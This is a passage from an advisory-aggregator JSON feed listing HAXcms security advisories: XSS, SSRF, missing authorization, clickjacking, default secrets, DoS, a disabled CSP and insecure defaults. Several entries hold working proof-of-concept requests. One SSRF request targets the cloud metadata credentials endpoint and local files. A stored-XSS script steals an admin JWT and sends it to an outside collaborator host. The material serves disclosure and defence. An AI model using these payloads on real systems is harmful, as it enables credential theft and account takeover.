XSS leading to:\n\n- Theft of JWT authentication tokens \n- Session hijacking\n- Full account takeover\n- Execution of arbitrary JavaScript in victim browsers\n\nIf an administrator views a malicious page, this can lead to full CMS compromise.\n\nAttack complexity: Low  \nPrivileges required: Low (any authenticated user)  \nUser interaction: Required","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-19T14:44:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-2m6p-hm3w-6jm3","https://nvd.nist.gov/vuln/detail/CVE-2026-46496","https://github.com/advisories/GHSA-2m6p-hm3w-6jm3"],"source_kind":"github","identifiers":["GHSA-2m6p-hm3w-6jm3","CVE-2026-46496"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T15:00:17.494Z","updated_at":"2026-10-02T13:02:56.587Z","epss_percentage":0.0039,"epss_percentile":0.30589,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ybTZwLWhtM3ctNmptM84ABXFf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0ybTZwLWhtM3ctNmptM84ABXFf","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/video-player","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fvideo-player"},{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0ybTZwLWhtM3ctNmptM84ABXFf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xODYyLWdjZ3EtNW02Z84ABXFe","url":"https://github.com/advisories/GHSA-q862-gcgq-5m6g","title":"HAXcms createSite SSRF Enables Arbitrary File Read","description":"### Summary  \nAn authenticated Server-Side Request Forgery (SSRF) vulnerability in HAXcms allows users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access.\n\n### Details  \nThe `createSite` endpoint in HAXcms (v11.0.6) accepts a `build.files` parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed without validation and ultimately fetched server-side using `file_get_contents()`.\n\nThe data flow is as follows:\n- User input (`build.files`) is processed via `object_to_array()` into a PHP array  \n- Assigned to `$filesToDownload` in `Operations.php` (line 2626)  \n- Iterated over in `Operations.php` (line 2730), where each entry is passed to `HAXCMSFile::save()` with bulk-import enabled  \n\nIn `HAXCMSFile.php` (line 30), the following occurs:\n```php\nfile_get_contents($upload['tmp_name']);\n```\n\nHere, tmp_name is attacker-controlled and may contain:\n\n- External URLs (`http://attacker.com`)\n- Internal services (`http://127.0.0.1`)\n- Cloud metadata endpoints (`http://169.254.169.254`)\n- Local file paths (`/etc/passwd`, `/proc/self/environ`)\n\nThe bulk-import flag bypasses `is_uploaded_file()` validation, which normally ensures the file originates from a legitimate upload. The only restriction is an extension whitelist based on the filename (array key), which is fully attacker-controlled.\n\nThere are no restrictions on:\n\n- URL schemes (`http`, `file`, `gopher`, etc.)\n- Destination IP ranges (internal, loopback, metadata services)\n- Response content\n\nAll fetched content is written to:\n```\nsites/\u003csitename\u003e/files/\u003cfilename\u003e\n```\nand is accessible via the web.\n\n### PoC\nPrerequisites:\n\n- Authenticated session (default credentials: `admin/admin` on fresh installs)\n- Valid JWT and CSRF token\n\nStep 1: Log in and capture JWT + CSRF token\n\nStep 2: Send crafted request:\n```\nPOST /createSite HTTP/1.1\nHost: target\nAuthorization: Bearer [JWT]\nX-CSRF-Token: [TOKEN]\nContent-Type: application/json\n\n{\n  \"site\": {\n    \"name\": \"poc\"\n  },\n  \"build\": {\n    \"files\": {\n      \"poc.txt\": {\n        \"tmp_name\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n      }\n    }\n  }\n}\n```\n\nStep 3: Retrieve response:\n```\nGET /sites/poc/files/poc.txt\n```\n\nThe response will contain the fetched content (e.g., cloud credentials or internal service data).\n\n### Impact\n\n- SSRF enabling access to internal network services\n- Arbitrary file read via local filesystem paths\n- Cloud credential exposure through metadata endpoints\n- Data exfiltration via web-accessible file storage\n\nAny authenticated user can exploit this to access sensitive server or infrastructure data, potentially leading to full system or cloud environment compromise.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-19T14:44:20.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-q862-gcgq-5m6g","https://nvd.nist.gov/vuln/detail/CVE-2026-46393","https://github.com/advisories/GHSA-q862-gcgq-5m6g"],"source_kind":"github","identifiers":["GHSA-q862-gcgq-5m6g","CVE-2026-46393"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T15:00:17.494Z","updated_at":"2026-09-28T20:03:13.552Z","epss_percentage":0.00381,"epss_percentile":0.29519,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xODYyLWdjZ3EtNW02Z84ABXFe","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xODYyLWdjZ3EtNW02Z84ABXFe","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xODYyLWdjZ3EtNW02Z84ABXFe/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zZm0yLXhmcTctNzc3OM4ABQ9g","url":"https://github.com/advisories/GHSA-3fm2-xfq7-7778","title":"HAXcms Has Stored XSS Vulnerability that May Lead to Account Takeover","description":"### Summary\nStored XSS Leading to Account Takeover\n\n### Details\nThe Exploit Chain:\n1.Upload: The attacker uploads an `.html` file containing a JavaScript payload.\n2.Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file.\n3.Token Refresh: The JavaScript payload makes a `fetch` request to the `/system/api/refreshAccessToken` endpoint. Because the administrator is logged in, their browser automatically attaches the `haxcms_refresh_token` cookie to this request.\n4.JWT Theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response.\n5.Exfiltration: The JavaScript captures this new JWT from the response and sends it to an attacker-controlled server.\n6.Account Takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.\n\nVulnerability recurrence:\n\n\u003cimg width=\"1198\" height=\"756\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7062d542-702e-4cbe-8493-da0f71e790c3\" /\u003e\n\nThen we test access to this html\n\n\u003cimg width=\"1433\" height=\"1019\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6c72c92f-a151-4b0e-b6ba-d83ffb771253\" /\u003e\n\nYou can obtain other people's identity information\n\n\u003cimg width=\"1082\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/23398ea4-f08c-47bd-b2f1-89071af0e275\" /\u003e\n\n\n### PoC\nPOST /system/api/saveFile?siteName=yu\u0026site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ\u0026jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1\nHost: 192.168.1.72:8080\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\nConnection: close\nContent-Length: 1128\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"bulk-import\"\n\ntrue\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"file-upload\"; filename=\"files/pwn1116.html\"\nContent-Type: text/plain\n\n\u003cscript\u003e\n  // This version adds headers to make the request look more legitimate.\n  fetch('/system/api/refreshAccessToken', {\n    method: 'POST',\n    headers: {\n      'Content-Type': 'application/json'\n    },\n    body: '{}' // Sending an empty JSON object body\n  })\n  .then(response =\u003e {\n    if (!response.ok) {\n        throw new Error('Network response was not ok ' + response.statusText);\n    }\n    return response.json();\n  })\n  .then(data =\u003e {\n    var stolenJWT = data.jwt;\n    var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?jwt=' + stolenJWT;\n    fetch(attackerUrl);\n  })\n  .catch(error =\u003e {\n    var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?error=' + error.message;\n    fetch(attackerUrl);\n  });\n\u003c/script\u003e\n\u003ch1\u003eProcessing your request...\u003c/h1\u003e\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n\n\n### Impact\nThe attacker now possesses a valid administrator JWT and can take full control of the application.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-13T15:07:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.0,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778","https://nvd.nist.gov/vuln/detail/CVE-2026-22704","https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0","https://github.com/haxtheweb/haxcms-nodejs/commit/317a8ae29f88be389f7cfeffaef416957122d97e","https://github.com/advisories/GHSA-3fm2-xfq7-7778"],"source_kind":"github","identifiers":["GHSA-3fm2-xfq7-7778","CVE-2026-22704"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-13T16:00:08.179Z","updated_at":"2026-09-28T20:05:52.322Z","epss_percentage":0.01042,"epss_percentile":0.62549,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZm0yLXhmcTctNzc3OM4ABQ9g","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zZm0yLXhmcTctNzc3OM4ABQ9g","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"25.0.0","vulnerable_version_range":"\u003e= 11.0.6, \u003c 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZm0yLXhmcTctNzc3OM4ABQ9g/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05anI5LThmZjMtbTg5NM4ABKiL","url":"https://github.com/advisories/GHSA-9jr9-8ff3-m894","title":"HAX CMS API Lacks Authorization Checks","description":"### Summary\n\nThe HAX CMS API endpoints do not perform authorization checks when interacting with a resource. Both the JS and PHP versions of the CMS do not verify that a user has permission to interact with a resource before performing a given operation.\n\n### Details\n\nThe API endpoints within the HAX CMS application check if a user is authenticated, but don't check for authorization before performing an operation.\n\n#### Affected Resources\n\n- [Operations.php: 760](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L760) `createNode()`\n- [Operations.php: 868](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L868) `saveNode()`\n- [Operations.php: 1171](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L1171) `deleteNode()`\n- [Operations.php: 1789](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L1789) `listSites()`\n- [Operations.php: 1890](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L1890) `createSite()`\n- [Operations.php: 2196](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L2195) `getConfig()`\n- [Operations.php: 2389](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L2389) `cloneSite()`\n- [Operations.php: 2467](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L2467) `deleteSite()`\n- [Operations.php: 2524](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L2524) `downloadSite()`\n- [Operations.php: 2607](https://github.com/haxtheweb/haxcms-php/blob/b158d8ba1f9602af92ab084fd03b418f953079fd/system/backend/php/lib/Operations.php#L2606) `archiveSite()`\n\n\n_Note: This may not include all affected endpoints within the application._\n\n### Impact\n\nAn authenticated attacker can make requests to interact with other users' sites. This can be used to enumerate, modify, and delete other users' sites and nodes.\n\nAdditionally, an authenticated attacker can use the 'getConfig' endpoint to pull the application's configuration, which may store cleartext credentials.\n\n### PoC - /deleteNode\n\n1. Browse to the 'site.json' file for a target site, and note the ID of the item to delete.\n\n![image](https://github.com/user-attachments/assets/84f8b396-876e-402b-b252-86d6cdec66c0)\n\n2. Make a POST request to the 'deleteNode' endpoint with a valid JWT and the target object ID.\n\n![image](https://github.com/user-attachments/assets/750f6b2b-ad57-4230-8fd9-05100c25cef5)\n\nSite before editing:\n\n![image](https://github.com/user-attachments/assets/b7482b53-fc12-4aca-a135-082f1751d4a2)\n\nSite after editing:\n\n![image](https://github.com/user-attachments/assets/5a982f70-d8ef-4523-bcdc-da2b5aa7f019)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-25T20:10:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-9jr9-8ff3-m894","https://github.com/haxtheweb/haxcms-nodejs/commit/5826e9b7f3d8c7c7635411768b86b199fad36969","https://nvd.nist.gov/vuln/detail/CVE-2025-54378","https://github.com/haxtheweb/haxcms-php/commit/24d30222481ada037597c4d7c0a51a1ef7af6cfd","https://github.com/advisories/GHSA-9jr9-8ff3-m894"],"source_kind":"github","identifiers":["GHSA-9jr9-8ff3-m894","CVE-2025-54378"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":2.0,"created_at":"2025-07-25T21:09:16.160Z","updated_at":"2026-10-02T13:06:39.947Z","epss_percentage":0.005,"epss_percentile":0.40536,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05anI5LThmZjMtbTg5NM4ABKiL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05anI5LThmZjMtbTg5NM4ABKiL","packages":[{"ecosystem":"packagist","package_name":"elmsln/haxcms","versions":[{"first_patched_version":"11.0.14","vulnerable_version_range":"\u003c 11.0.14"}],"purl":null},{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.14","vulnerable_version_range":"\u003c 11.0.14"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05anI5LThmZjMtbTg5NM4ABKiL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01NHZ3LWY0eGYtZjkyas4ABKWO","url":"https://github.com/advisories/GHSA-54vw-f4xf-f92j","title":"HAX CMS application pages vulnerable to clickjacking","description":"### Summary\n\nAll pages within the HAX CMS application do not contain headers to stop other websites from loading the site within an iframe. This applies to both the CMS and generated sites.\n\n### PoC\n\nTo replicate this vulnerability, load the target page in an iframe and observe the rendered content.\n\n![image](https://github.com/user-attachments/assets/84526738-7101-4842-9bac-d33a41091600)\n\n\n### Impact\n\nAn unauthenticated attacker can load the standalone login page or other sensitive functionality within an iframe, performing a UI redressing attack (Clickjacking). This can be used to perform social engineering attacks to attempt to coerce users into performing unintended actions within the HAX CMS application.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-07-21T21:12:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-54vw-f4xf-f92j","https://github.com/haxtheweb/haxcms-nodejs/commit/777f9a7ff9675a160496f350d766df1f1f9b9b99","https://github.com/haxtheweb/haxcms-php/commit/708dc8518928fe307044e67bff8b0f397cfdd606","https://nvd.nist.gov/vuln/detail/CVE-2025-54139","https://github.com/advisories/GHSA-54vw-f4xf-f92j"],"source_kind":"github","identifiers":["GHSA-54vw-f4xf-f92j","CVE-2025-54139"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":2.0,"created_at":"2025-07-21T22:08:55.399Z","updated_at":"2026-09-28T20:07:06.940Z","epss_percentage":0.00312,"epss_percentile":0.21536,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NHZ3LWY0eGYtZjkyas4ABKWO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01NHZ3LWY0eGYtZjkyas4ABKWO","packages":[{"ecosystem":"packagist","package_name":"elmsln/haxcms","versions":[{"first_patched_version":"11.0.8","vulnerable_version_range":"\u003c 11.0.8"}],"purl":null},{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.13","vulnerable_version_range":"\u003c 11.0.13"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NHZ3LWY0eGYtZjkyas4ABKWO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01ZnB2LTVxdmgtN2NmM84ABKWM","url":"https://github.com/advisories/GHSA-5fpv-5qvh-7cf3","title":"NodeJS version of the HAX CMS application is distributed with Default Secrets","description":"### Summary\n\nThe NodeJS version of the HAX CMS application is distributed with hardcoded default credentials for the user and superuser accounts. Additionally, the application has default private keys for JWTs. Users aren't prompted to change credentials or secrets during installation, and there is no way to change them through the UI.\n\n### Affected Resources\n\n- [HAXCMS.js](https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/lib/HAXCMS.js#L1614) HAXCMSClass\n\n### Impact\n\nAn unauthenticated attacker can read the default user credentials and JWT private keys from the public haxtheweb GitHub repositories. These credentials and keys can be used to access unconfigured self-hosted instances of the application, modify sites, and perform further attacks.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-21T19:53:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-5fpv-5qvh-7cf3","https://github.com/haxtheweb/haxcms-nodejs/commit/6dc2441c876350ca6fe9fbaecb058d92ef442869","https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/lib/HAXCMS.js#L1614","https://nvd.nist.gov/vuln/detail/CVE-2025-54137","https://github.com/advisories/GHSA-5fpv-5qvh-7cf3"],"source_kind":"github","identifiers":["GHSA-5fpv-5qvh-7cf3","CVE-2025-54137"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-07-21T20:08:36.437Z","updated_at":"2026-09-28T20:07:06.941Z","epss_percentage":0.00345,"epss_percentile":0.25516,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnB2LTVxdmgtN2NmM84ABKWM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01ZnB2LTVxdmgtN2NmM84ABKWM","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.10","vulnerable_version_range":"\u003c 11.0.10"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnB2LTVxdmgtN2NmM84ABKWM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wamozLWo1ajYtcWoyN84ABKWL","url":"https://github.com/advisories/GHSA-pjj3-j5j6-qj27","title":"HAX CMS NodeJS Application Has Improper Error Handling That Leads to Denial of Service","description":"### Summary\nThe HAX CMS NodeJS application crashes when an authenticated attacker provides an API request lacking required URL parameters. This vulnerability affects the `listFiles` and `saveFiles` endpoints.\n\n### Details\nThis vulnerability exists because the application does not properly handle exceptions which occur as a result of changes to user-modifiable URL parameters.\n\n#### Affected Resources\n• [listFiles.js:22](https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/listFiles.js#L22) listFiles()\n• [saveFile.js:52](https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/saveFile.js#L52) saveFile()\n• system/api/listFiles\n• system/api/saveFile\n\n### PoC\n1. Targeting an instance of instance of [HAX CMS NodeJS](https://github.com/haxtheweb/haxcms-nodejs), send a request without parameters to `listFiles` or `saveFiles`. The following screenshot shows the request in Burp Suite.\n![listfilesrequest](https://github.com/user-attachments/assets/477ea4e0-5707-4948-b53c-7f042a0475fb)\n\n2. The server will crash with `ERR_INVALID_ARG_TYPE`.\n![listfilescrash](https://github.com/user-attachments/assets/85424c12-1619-41d3-9bf5-9e029cdaa8c1)\n\n### Impact\nAn authenticated attacker can deny access to the HAX CMS NodeJS application by crashing the backend server. This prevents all users from accessing the backend system. If the backend system is hosting websites, those websites will be unavailable.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-21T19:52:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-pjj3-j5j6-qj27","https://github.com/haxtheweb/haxcms-nodejs/commit/e9773d1996233f9bafb06832b8220ec2a98bab34","https://nvd.nist.gov/vuln/detail/CVE-2025-54134","https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/listFiles.js#L22","https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/saveFile.js#L52","https://github.com/advisories/GHSA-pjj3-j5j6-qj27"],"source_kind":"github","identifiers":["GHSA-pjj3-j5j6-qj27","CVE-2025-54134"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-07-21T20:08:37.437Z","updated_at":"2026-09-25T12:07:42.678Z","epss_percentage":0.00414,"epss_percentile":0.32882,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wamozLWo1ajYtcWoyN84ABKWL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wamozLWo1ajYtcWoyN84ABKWL","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.9","vulnerable_version_range":"\u003c 11.0.9"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wamozLWo1ajYtcWoyN84ABKWL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01OWc4LWg1OWYtOGhqcM4ABKWK","url":"https://github.com/advisories/GHSA-59g8-h59f-8hjp","title":"NodeJS version of HAX CMS Has Disabled Content Security Policy That Enables Cross-Site Scripting","description":"### Summary\nThe NodeJS version of HAX CMS has a disabled Content Security Policy (CSP). This configuration is insecure for a production application because it does not protect against cross-site-scripting attacks.\n\n### Details\nThe `contentSecurityPolicy` value is explicitly disabled in the application's Helmet configuration in `app.js`.\n\n![permissive-csp-code](https://github.com/user-attachments/assets/8ec6c63c-9f9f-413e-be7e-ed14913da91c)\n\n#### Affected Resources\n- [app.js:52](https://github.com/haxtheweb/haxcms-nodejs/blob/b1f95880b42fea6ed07855b5804b29b182ec5e07/src/app.js#L52)\n\n### PoC\nTo reproduce this vulnerability, [install](https://github.com/haxtheweb/haxcms-nodejs) HAX CMS NodeJS. The application will load without a CSP configured.\n\n### Impact\nIn conjunction with an XSS vulnerability, an attacker could execute arbitrary scripts and exfiltrate data, including session tokens and sensitive local data.\n\n#### Additional Information\n- [OWASP: Content Security Policy](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-07-21T19:51:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:H/SC:L/SI:L/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-59g8-h59f-8hjp","https://github.com/haxtheweb/haxcms-nodejs/commit/ddb9351c6d6418008d4084a5b17fd6d611bc4e30","https://nvd.nist.gov/vuln/detail/CVE-2025-54128","https://github.com/advisories/GHSA-59g8-h59f-8hjp"],"source_kind":"github","identifiers":["GHSA-59g8-h59f-8hjp","CVE-2025-54128"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-07-21T20:08:37.509Z","updated_at":"2026-09-25T12:07:42.679Z","epss_percentage":0.00202,"epss_percentile":0.08906,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc4LWg1OWYtOGhqcM4ABKWK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01OWc4LWg1OWYtOGhqcM4ABKWK","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.8","vulnerable_version_range":"\u003c= 11.0.7"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01OWc4LWg1OWYtOGhqcM4ABKWK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mMzhmLWp2cWotbWZnNs4ABKWJ","url":"https://github.com/advisories/GHSA-f38f-jvqj-mfg6","title":"NodeJS version of HAX CMS Has Insecure Default Configuration That Leads to Unauthenticated Access","description":"### Summary\nThe NodeJS version of HAX CMS uses an insecure default configuration designed for local\ndevelopment. The default configuration does not perform authorization or authentication checks.\n\n### Details\nIf a user were to deploy haxcms-nodejs without modifying the default settings, ‘HAXCMS_DISABLE_JWT_CHECKS‘ would be set to ‘true‘ and their deployment would lack session authentication. \n\n![insecure-default-configuration-code](https://github.com/user-attachments/assets/af58b08a-8a26-4ef5-8deb-e6e9d4efefaa)\n\n#### Affected Resources\n- [package.json:13](https://github.com/haxtheweb/haxcms-nodejs/blob/a4d2f18341ff63ad2d97c35f9fc21af8b965248b/package.json#L13)\n\n### PoC\nTo reproduce this vulnerability, [install](https://github.com/haxtheweb/haxcms-nodejs) HAX CMS NodeJS. The application will load without JWT checks enabled. \n\n### Impact\nWithout security checks in place, an unauthenticated remote attacker could access, modify, and delete all site information.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-07-21T19:48:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-f38f-jvqj-mfg6","https://nvd.nist.gov/vuln/detail/CVE-2025-54127","https://github.com/advisories/GHSA-f38f-jvqj-mfg6"],"source_kind":"github","identifiers":["GHSA-f38f-jvqj-mfg6","CVE-2025-54127"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-07-21T20:08:37.575Z","updated_at":"2026-09-25T12:07:42.679Z","epss_percentage":0.00403,"epss_percentile":0.31782,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMzhmLWp2cWotbWZnNs4ABKWJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mMzhmLWp2cWotbWZnNs4ABKWJ","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.7","vulnerable_version_range":"\u003c= 11.0.6"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMzhmLWp2cWotbWZnNs4ABKWJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nNGNmLXBwNHgtaHFnd84ABIzw","url":"https://github.com/advisories/GHSA-g4cf-pp4x-hqgw","title":"HaxCMS-PHP Command Injection Vulnerability","description":"### Summary\nThe 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into 